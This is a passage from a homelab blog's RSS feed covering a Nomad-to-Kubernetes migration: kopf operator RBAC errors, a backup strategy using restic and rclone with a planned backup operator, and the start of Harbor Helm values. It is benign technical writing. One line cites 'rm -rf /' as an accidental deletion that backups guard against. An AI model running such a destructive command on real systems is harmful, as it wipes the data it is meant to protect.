</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">apiGroups</span>: [<span style="color:#e6db74">&#34;&#34;</span>]
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">resources</span>: [<span style="color:#ae81ff">events]</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">verbs</span>: [<span style="color:#ae81ff">create]</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">apiGroups</span>: [<span style="color:#e6db74">&#34;mei-home.net&#34;</span>]
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">homelabbackupconfigs</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">verbs</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">get</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">watch</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">list</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">patch</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">update</span>
</span></span><span style="display:flex;"><span>---
</span></span><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">rbac.authorization.k8s.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">RoleBinding</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">hlbo-role</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">hlbo</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">roleRef</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">apiGroup</span>: <span style="color:#ae81ff">rbac.authorization.k8s.io</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Role</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">hlbo-role</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">subjects</span>:
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ServiceAccount</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">hlbo-account</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">backups</span>
</span></span></code></pre></div><p>This produced a number of errors when trying to launch my rudimentary operator:</p>
<pre tabindex="0"><code>[2024-05-12 14:19:55,454] kopf._core.reactor.o [ERROR   ]
Watcher for homelabbackupconfigs.v1alpha1.mei-home.net@none has failed:
&#39;homelabbackupconfigs.mei-home.net is forbidden: User &#34;system:serviceaccount:backups:hlbo-account&#34; cannot list resource &#34;homelabbackupconfigs&#34; in API group &#34;mei-home.net&#34; at the cluster scope&#39;
</code></pre><p>Okay, this seems reasonably clear to me. I&rsquo;ve only created a Role and done a
RoleBinding for the <code>backups</code> Namespace, where the operator resides.</p>
<p>I also tried another variant. Instead of using <code>-A</code> to have kopf use the cluster
API, one can provide <code>--namespace=*</code>. This tells kopf to use the namespaced API,
but list all Namespaces and watch them all. Then, I allowed kopf to list all
Namespaces, while still only allowing it access to the HomelabBackupConfig in the
backups Namespace. This results in a lot of errors when it tries to
watch HomelabBackupConfigs in Namespaces other than backups, but the operator
keeps running. So this might be a &ldquo;solution&rdquo;.</p>
<p>I could also return to using <code>-A</code> and just configure everything in a ClusterRole.
But that&rsquo;s just more permissions than the operator needs. And I will also need
to grant it access to the Jobs API, which I don&rsquo;t want to do cluster-wide
either.</p>
<p>And finally, the individual handlers don&rsquo;t allow defining a Namespace to watch
a specific resource in. The only config is the command line flag, and that
applies to all resources and their handlers.</p>
<p>So it looks like I have to search for another framework, as kopf doesn&rsquo;t seem to
allow me to do things in the least-privilege way I want them done. &#x1f614;</p>
<p>If you&rsquo;ve got a good idea or you think I&rsquo;ve overlooked something, please feel
free to ping me on the <a href="https://social.mei-home.net/@mmeier">Fediverse</a>.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Part 12: Backup Plan</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-12-backup-issues/</link>
      <pubDate>Sun, 05 May 2024 11:10:21 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-migration-12-backup-issues/</guid>
      <description>It seems I need a new backup strategy</description>
      <content:encoded><![CDATA[<p>Wherein it seems I need a new backup strategy.</p>
<p>This is part 13 of my <a href="https://blog.mei-home.net/tags/k8s-migration/">k8s migration series</a>.</p>
<p>During the last week, I&rsquo;ve started to work on implementing my backup strategy
for the new Kubernetes cluster. The original plan was to stay with what I&rsquo;m already
doing in my Nomad cluster. But it turns out I can&rsquo;t, so I need a new strategy.</p>
<p>If you&rsquo;re prone to suffering from IT-related nightmares, you might wish to skip
this one. The Nomad backup implementation ain&rsquo;t pretty, and my current plans for
the k8s backup implementation ain&rsquo;t going to make it any prettier. You&rsquo;ve been
warned.</p>
<h2 id="speaking-of-backups">Speaking of backups</h2>
<p>You should do backups. They don&rsquo;t have to be perfect. As you will see in the
next section, mine definitely aren&rsquo;t. But they&rsquo;re serving me well.</p>
<p>I&rsquo;ve only ever needed backups once, right after I left university and my entire
life was stored on a single laptop&rsquo;s internal HDD - and that HDD failed. But:
I was lucky, in that I had backups of my <code>/home</code> directory only about 24h old.</p>
<p>So all good, you might think. But not really. You see, my backups were encrypted.
And now guess where the only copy of that decryption key was stored. Exactly.
I got pretty lucky again, in that I was able to read the key from the broken
disk. But these days, I&rsquo;ve got my keys stored in several places.</p>
<p>In fact, I went one step further: There&rsquo;s an unencrypted USB stick with a copy of
my password manager and PGP keys in a bank vault.
So don&rsquo;t forget to <em>separately</em> back up your backup&rsquo;s encryption key!</p>
<p>Generally, backups are supposed to be 3-2-1:</p>
<ul>
<li>Three different copies of your data</li>
<li>On two different kinds of media</li>
<li>With one copy off-site</li>
</ul>
<p>I do not have an off-site copy anywhere yet, save for the aforementioned USB
stick with my unencrypted password manager.</p>
<p>And for me, the &ldquo;two different kinds of media&rdquo; isn&rsquo;t really two different kinds
of media. It&rsquo;s more like &ldquo;two independent systems&rdquo;, because even the data that&rsquo;s
really important to me is already too big to store even on multiple DVDs, which
is the only medium I would call &ldquo;sensible&rdquo; for a consumer.</p>
<p>What I do find important is incremental backups. Don&rsquo;t just overwrite the previous
day&rsquo;s backup with the current one. Because incremental backups aren&rsquo;t there to protect you
from faulty devices, but rather to protect you from yourself. This might be a
fat-fingered <code>rm -rf /</code>, or a ransomware infection. With incremental backups,
you can always go back.</p>
<p>My general strategy is:</p>
<ul>
<li>One yearly backup</li>
<li>One monthly backup for the past six months</li>
<li>One weekly backup for the past six weeks</li>
<li>A daily backup for the past seven days</li>
</ul>
<p>That should make sure that I can even recover from an accidental delete I
only realize I made a couple of months later.</p>
<h2 id="the-current-state-of-backups-in-my-nomad-cluster">The current state of backups in my Nomad cluster</h2>
<p>The basis of my backups, both in my Homelab and for my other hosts, is
<a href="https://restic.net/">restic</a>. It&rsquo;s a CLI backup program which supports a wide
range of backup targets, encryption and incremental backups.</p>
<p>Restic then pushes all of those, both the data volumes from my Homelab services
and my <code>/home</code> dir from my workstation and laptop, into an S3 bucket on my Ceph
cluster, on a pool with two replicas. For the stuff coming from my workstation,
this is already an improvement, because the backup is stored on different disks
than the original data.
But it doesn&rsquo;t do very much for my Homelab data volumes, because those are all
located on that same Ceph cluster. The only advantage those backups bring is their
incremental nature, so if I accidentally delete a volume, I can still get the data
back.</p>
<p>The second part, which fulfills the &ldquo;two different types of media&rdquo; requirement
is a backup on an external HDD. This backup is a bit more selective than the
relatively broad restic backup, because that single external HDD isn&rsquo;t big
enough to hold all of my data. But it is easily big enough to hold all the data
I genuinely care about.</p>
<p>I&rsquo;m running both of those backup jobs through the Nomad cluster. The first
backup, dubbed my &ldquo;services backup&rdquo;, backs up the data volumes attached to my
Homelab services. The second one, called the &ldquo;external backup&rdquo;, takes a couple
of the S3 buckets used as targets in the services backup, and clones them onto
an external HDD.</p>
<h3 id="the-services-backup">The services backup</h3>
<p>The services backup is deployed in the Nomad cluster as a <a href="https://developer.hashicorp.com/nomad/docs/schedulers#system-batch">System Batch</a>
type job. These jobs are similar to Kubernetes&rsquo; DaemonSet, in that they run a
job instance on every host, but they are of the &ldquo;run-to-completion&rdquo; type, similar
to Kubernetes&rsquo; Job object, instead of starting a daemon which stays
active on each node.</p>
<p>This job needs to be run in <em>privileged</em> mode, because it mounts the directory
where CSI drivers mount CSI volumes on the host into the job&rsquo;s container.</p>
<p>Yes, you read that right: On all my Nomad cluster hosts, every night, there runs
a container which mounts the mount directories of all mounted CSI volumes.</p>
<p>Once that&rsquo;s done, the container runs a small Python program I&rsquo;ve written to do
the actual backup.
It does roughly the following:</p>
<ol>
<li>Check which jobs are running on the current node</li>
<li>Check which volumes from those jobs are noted as needing backups in a config file</li>
<li>Run restic against those directories and push them into an S3 bucket on Ceph</li>
</ol>
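<p>To make step 3 a bit more concrete, the restic invocation boils down to
something like the following. This is a hypothetical sketch, not the actual
program; the repository URL and the volume mapping are made up for illustration:</p>
<pre tabindex="0"><code>import subprocess


def backup_volumes(volumes_to_backup, repo_base="s3:https://s3.example.net/service-backups"):
    """volumes_to_backup maps a volume name to its mount path on this node."""
    for name, mount_path in volumes_to_backup.items():
        # restic reads the repository password and the S3 credentials from the
        # environment (RESTIC_PASSWORD, AWS_ACCESS_KEY_ID, ...).
        subprocess.run(
            ["restic", "--repo", f"{repo_base}/{name}", "backup", mount_path],
            check=True,
        )
</code></pre>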
<p>In addition, I&rsquo;m also using <a href="https://rclone.org/">rclone</a> to back up S3 buckets
from those apps which use them for storage. This, again, does not make the data
more resilient, but it is again protection against accidental bucket deletion
and similar things.</p>
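<p>That bucket backup could look roughly like this, again as a hypothetical
sketch; the rclone remote and bucket names are made up:</p>
<pre tabindex="0"><code>import subprocess


def backup_bucket(source_bucket, backup_bucket, remote="ceph"):
    # Mirror the app's bucket into a dedicated backup bucket, relying on an
    # rclone remote that has been configured elsewhere.
    subprocess.run(
        ["rclone", "sync", f"{remote}:{source_bucket}", f"{remote}:{backup_bucket}"],
        check=True,
    )
</code></pre>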
<p>This approach has a number of downsides. First, it is not 100% reliable. I&rsquo;m
backing up the data from volumes while those volumes are mounted and used by
their services. I don&rsquo;t have too much of a problem with that, simply because the
data on disk does not change too much during the times when I run the backups.
But it is still something to consider.
In addition, the overall backup job setup is also not the safest from a security
point of view. I&rsquo;m taking the mounted data for all of my services and mounting it
into a single container. At least from a data access standpoint, that container
is basically root on my cluster nodes and can access the data for all services
in the Homelab.</p>
<h3 id="the-external-disk-backup">The external disk backup</h3>
<p>The second part of the backup strategy is to take the backup repositories created
by the service backups described above, as well as the ones created by my host
backups, and clone them onto an external HDD connected to one of my nodes. This
is also implemented as a Nomad job.</p>
<p>This job receives the <code>/dev</code> device for the USB external HDD, instead of receiving
the already mounted directory. This is another defense in depth, as it allows me
to mount the backup disk only when it is really needed/used, and not have it
mounted all the time. This is a small defense against both encryption ransomware
and accidental deletion.</p>
<p>But it also has one downside: Security, again. To be allowed to call the <code>mount</code>
command in the container, I have to run it in privileged mode.</p>
<p>This job does not have to do anything fancy in the implementation itself. It
mounts the external HDD and then runs rclone on all of the backup S3 buckets
defined in the configuration file for the services backup, plus a couple of
additional buckets for e.g. my <code>/home</code> backups. All of those get cloned onto
the external HDD. Here, I&rsquo;m not using restic and incremental backups, simply
because the individual backup buckets already contain the incremental backups.</p>
<p>This part of the backup I had already transferred over to my Kubernetes cluster,
without much issue.</p>
<h2 id="the-issue-with-migrating-the-backups-to-the-k8s-cluster">The issue with migrating the backups to the k8s cluster</h2>
<p>My main issue came yesterday, when I started to plan the addition of the service
backup job to Kubernetes. The basic functionality seemed to be available. I
could just mount the <code>/var/lib/kubelet/plugins/kubernetes.io/csi/rook-ceph.rbd.csi.ceph.com</code>
directory into the container. That&rsquo;s the directory where the Ceph CSI plugin I
use to provide PersistentVolumes mounts the volumes.</p>
<p>But then I checked how to actually run the job. As noted above, I needed to
have a run-to-completion pod running on every host in the cluster. And it looks
like k8s just doesn&rsquo;t have anything equivalent to Nomad&rsquo;s System Batch type of
job.</p>
<p>So what to do instead? One option would be to change the small Python app I
wrote, so that it doesn&rsquo;t just run the current backup cycle and then exit,
but instead runs continuously. I could then put it into a <a href="https://kubernetes.io/docs/concepts/workloads/controllers/daemonset/">DaemonSet</a>
on each k8s node. That would very likely have worked. But since my initial
tests with k8s back in August 2023, I had thought that I might implement a small
&ldquo;Homelab Backups&rdquo; operator.</p>
<h2 id="over-engineered-but-hopefully-fun">Over-engineered, but hopefully fun</h2>
<p>So if we take a hard look at my current setup for services and external backups,
there are a number of crutches in there. First of all, there&rsquo;s the sequencing
problem. The nightly external HDD backup job should only run when all of the
service backup jobs have done their work for the night. But I was never able to
come up with a good way to do that, so I settled for just launching the external
HDD backup an hour after the service backup job. Not very elegant, but worked
well enough.</p>
<p>Then there was the issue of the &ldquo;run the service job on every host&rdquo; approach.
This is a shotgun approach, and also not very explicit in its configs. It&rsquo;s very
possible that there was no job with backups even running on any given host, so
the service backup run on that host would have been a waste.</p>
<p>Finally, the backup configuration, namely which volumes and S3 buckets should
be backed up, was done in configuration files for the two backup jobs - not
the individual app&rsquo;s jobs. So when removing or adding an app, I always had to
remember to also update the config of the backup jobs.</p>
<p>The idea I came up with, which solves all of the issues above, is to implement
a &ldquo;Homelab Backup&rdquo; Kubernetes Operator. That operator would handle &ldquo;HomelabBackup&rdquo;
objects, which I could configure individually for each app I&rsquo;m running that
needs backups. When I then remove the app, that manifest would also be removed
and the backup for that particular app would be stopped.</p>
<p>It might look something like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">HomelabBackup</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nextcloud</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">backupBucket</span>: <span style="color:#ae81ff">my-nextcloud-backup-bucket</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">schedule</span>: <span style="color:#e6db74">&#34;30 2 * * *&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">volumeClaims</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">my-nextcloud-pvc</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">external</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">s3Buckets</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">my-nextcloud-data-bucket</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">external</span>: <span style="color:#66d9ef">true</span>
</span></span></code></pre></div><p>This would allow the definition of PersistentVolumeClaims and S3 buckets to back
up, and also where to back them up to.</p>
<p>The operator would then not start one backup job for every node, but instead
launch one k8s Job workload per HomelabBackup object. I would then also be able
to watch those Jobs, and once they have all finished, one way or the other, I could
launch the external backup Job right away, instead of waiting for an
arbitrary amount of time. The dependency would now be explicit.</p>
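<p>A sketch of what that completion check might look like, assuming the operator
labels the Jobs it creates and using the same kubernetes_asyncio client stack;
the label and Namespace are illustrative:</p>
<pre tabindex="0"><code>from kubernetes_asyncio import client


async def all_backup_jobs_finished(api, namespace="backups"):
    batch = client.BatchV1Api(api)
    jobs = await batch.list_namespaced_job(
        namespace, label_selector="homelab/part-of=hlbo")

    def finished(job):
        # A Job is done once it has a Complete or Failed condition.
        for cond in (job.status.conditions or []):
            if cond.type in ("Complete", "Failed") and cond.status == "True":
                return True
        return False

    return all(finished(j) for j in jobs.items)
</code></pre>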
<p>With the operator launching the jobs, I will also be able to run each backup Job on
the node where the volume is currently mounted. This can be done by looking
at Kubernetes&rsquo; VolumeAttachment objects, which show on which node any given
volume is currently mounted.</p>
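<p>Finding that node could be done via the storage API, for example like this
(a sketch with the same client stack; the PersistentVolume name is illustrative):</p>
<pre tabindex="0"><code>from kubernetes_asyncio import client


async def node_for_volume(api, pv_name):
    storage = client.StorageV1Api(api)
    attachments = await storage.list_volume_attachment()
    for va in attachments.items:
        if va.spec.source.persistent_volume_name == pv_name:
            # node_name is the node the CSI driver attached the volume to.
            return va.spec.node_name
    return None
</code></pre>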
<p>I&rsquo;m also considering some scheduling, to make sure that on any given node,
there&rsquo;s only ever going to be a single Job running, because anything else would
likely tax my 1 Gbps network.</p>
<p>Looking around, I found the <a href="https://github.com/nolar/kopf">kopf</a> framework
for Kubernetes Operators in Python. This looks pretty well suited for my needs,
and Python is currently among my most familiar languages anyway. It would be nice
to go for Go instead, but I would first have to familiarize myself with the
language before I could write the operator. And the main goal here is still to
move forward with the k8s migration.</p>
<p>Overall, I&rsquo;m not actually too mad about this detour. It looks like it&rsquo;s going
to be an interesting dive into Kubernete&rsquo;s API and operator implementations,
and it&rsquo;s going to fix a couple of problems with my old backup implementation.
In the end, stuff like this is why I set the migration up in such a way that
I could do it iteratively, while both the Nomad and k8s clusters run side by
side.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Part 11: Container Registry with Harbor</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-11-harbor/</link>
      <pubDate>Sat, 27 Apr 2024 21:20:46 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-migration-11-harbor/</guid>
      <description>Running harbor for internal images and as a proxy for external registries</description>
      <content:encoded><![CDATA[<p>Wherein I migrate my internal container registry to Harbor.</p>
<p>This is part 12 of my <a href="https://blog.mei-home.net/tags/k8s-migration/">k8s migration series</a>.</p>
<p>Let&rsquo;s start by answering the obvious question: Why even have an internal
container registry? For me, there are two reasons:</p>
<ol>
<li>Some place to put my own container images</li>
<li>A cache for external images</li>
</ol>
<p>Most of my internal images are slightly changed external images. A prime example
is my Fluentd image. I&rsquo;ve extended the official image with a couple of additional
plugins. And I needed some place to store them.</p>
<p>My main reason for point 2) is to avoid waste. Why reach out to the Internet and
put additional unnecessary load on somebody else&rsquo;s infrastructure by pulling the
same image 12 times? It makes a lot more sense to me to only do that once and
then use an internal cache.
A secondary reason was of course the introduction of the DockerHub rate limit.
I tended to hit that pretty regularly, especially when I was working on my CI.</p>
<p>A tertiary reason is Deutsche Telekom. My ISP. A couple of years ago, they
tended to regularly get into peering battles with their tier 1 peering partners,
and consequently, you had some days where the entire US was connected down a
512 Kbps pipe. Or at least that was what it felt like. Pulling an image from
DockerHub ran with, I kid you not, 5 Kbps. Those days seem to be over, but I
still like to at least be able to use previously pulled images.</p>
<p>Finally, there might also be a speed advantage when pulling from a local cache
instead of reaching out to the Internet. But for me, that was never really a
consideration. I&rsquo;ve got a 1 Gbps LAN, and most of my storage runs off of a Ceph
cluster, with the image cache running on my bulk storage HDDs. So there&rsquo;s really
not going to be that much gain.</p>
<p>In my Nomad cluster, I had set up two instances of Docker&rsquo;s official <a href="https://distribution.github.io/distribution/">registry</a>.
Hm, it is now called &ldquo;distribution&rdquo;? And seemingly under the CNCF?
Ah:</p>
<blockquote>
<p>Registry, the open source implementation for storing and distributing container images and other content, has been donated to the CNCF. Registry now goes under the name of Distribution, and the documentation has moved to&hellip;</p></blockquote>
<p>From the <a href="https://docs.docker.com/registry/">official docs on the Docker page</a>.</p>
<p>I chose registry back then because it looked like a pretty low-powered solution.
For a GUI, I used <a href="https://github.com/Joxit/docker-registry-ui">docker-registry-ui</a>,
which I can warmly recommend.</p>
<p>But I also pretty much ran it as an open registry, which bothered me a bit. Plus,
I had looked a lot at <a href="https://goharbor.io/">Harbor</a>, but always found that it sounded a bit too much
oriented towards deployment in Kubernetes. And now that I&rsquo;m finally running
my own Kubernetes cluster, I decided to replace my two registry instances with
a single Harbor instance.</p>
<p>Another reason for wanting to look at Harbor was that I think at some point,
registry could only serve as a pull-through cache for DockerHub, but not for
other registries, e.g. <a href="https://quay.io">Quay.io</a>. But if I read <a href="https://distribution.github.io/distribution/recipes/mirror/">the docs</a>
right, it&rsquo;s now possible to mirror other registries with it as well.</p>
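<p>For reference, a pull-through setup in plain registry/distribution boils down to a
<code>proxy</code> section in its config file. This is just a hedged sketch based on my reading
of those docs, not a config I actually run:</p>
<pre tabindex="0"><code># excerpt of a distribution config.yml acting as a quay.io mirror
version: 0.1
storage:
  filesystem:
    rootdirectory: /var/lib/registry
proxy:
  remoteurl: https://quay.io   # upstream registry to mirror
  # username/password are only needed for authenticated upstreams
http:
  addr: :5000
</code></pre>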
<p>There are other alternatives as well. The first one, <a href="https://jfrog.com/artifactory/">Artifactory</a>,
is out, because while I know that it would fulfill my needs, it is also what we
use at work. And there is no great love lost between me and Artifactory. It will
only get deployed in my Homelab over my dead, cold, decomposing body.</p>
<p>Then there&rsquo;s <a href="https://www.sonatype.com/products/sonatype-nexus-oss">Sonatype Nexus</a>.
But quite frankly: That always gave off pretty strong &ldquo;We&rsquo;re going to go source
available within the week&rdquo; vibes.</p>
<p>Finally, there&rsquo;s Gitea and their relatively recently introduced <a href="https://docs.gitea.com/usage/packages/overview">package management feature</a>, which also includes a container registry.
The main reason I did not go with this one is that it currently doesn&rsquo;t support
pull-through caches, although <a href="https://github.com/go-gitea/gitea/issues/21223">there&rsquo;s a feature request</a>.
In addition, I&rsquo;m still a big fan of running apps which do one thing well, instead
of everything somewhat decently. (He says, looking at his Nextcloud file sharing/note taking/calendar/contacts/bookmarks moloch &#x1f605;)</p>
<p>So Harbor it is. Let&rsquo;s dig into it.</p>
<h2 id="harbor-setup">Harbor setup</h2>
<p>To setup Harbor, I used the <a href="https://github.com/goharbor/harbor-helm">official Helm chart</a>.
It is perfectly workable, but has some quirks when it comes to secrets handling,
which I will go into detail about later.
<p>Here is my <code>values.yaml</code> file for the chart:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">expose</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">type</span>: <span style="color:#ae81ff">ingress</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tls</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">certSource</span>: <span style="color:#ae81ff">none</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ingress</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">hosts</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">core</span>: <span style="color:#ae81ff">harbor.example.com</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">traefik.ingress.kubernetes.io/router.entrypoints</span>: <span style="color:#ae81ff">myentrypoint</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">harbor</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">harbor</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">externalURL</span>: <span style="color:#ae81ff">https://harbor.example.com</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">ipFamily</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ipv6</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">persistence</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">imageChartStorage</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">disableredirect</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">type</span>: <span style="color:#ae81ff">s3</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">s3</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">existingSecret</span>: <span style="color:#ae81ff">my-harbor-rgw-secret</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">bucket</span>: <span style="color:#ae81ff">harbor-random-numbers-here</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">regionendpoint</span>: <span style="color:#ae81ff">http://rook-ceph-rgw-myobjectstorename.my-rook-cluster-namespace.svc:80</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">v4auth</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">rootdirectory</span>: <span style="color:#ae81ff">/harbor</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">encrypt</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">secure</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">logLevel</span>: <span style="color:#ae81ff">info</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">existingSecretAdminPassword</span>: <span style="color:#ae81ff">my-admin-secret</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">existingSecretAdminPasswordKey</span>: <span style="color:#ae81ff">mySecretsKey</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">existingSecretSecretKey</span>: <span style="color:#ae81ff">my-harbor-secret-key-secret</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">portal</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">256Mi</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">100m</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">podLabels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">harbor</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">core</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">256Mi</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">100m</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">podLabels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">harbor</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">jobservice</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">jobLoggers</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">database</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">256Mi</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">100m</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">podLabels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">harbor</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">registry</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">registry</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">256Mi</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">100m</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">controller</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">256Mi</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">100m</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">podLabels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">harbor</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">credentials</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">username</span>: <span style="color:#ae81ff">my-harbor-registry-user</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">existingSecret</span>: <span style="color:#ae81ff">my-harbor-registry-user-secret</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">trivy</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">database</span>:
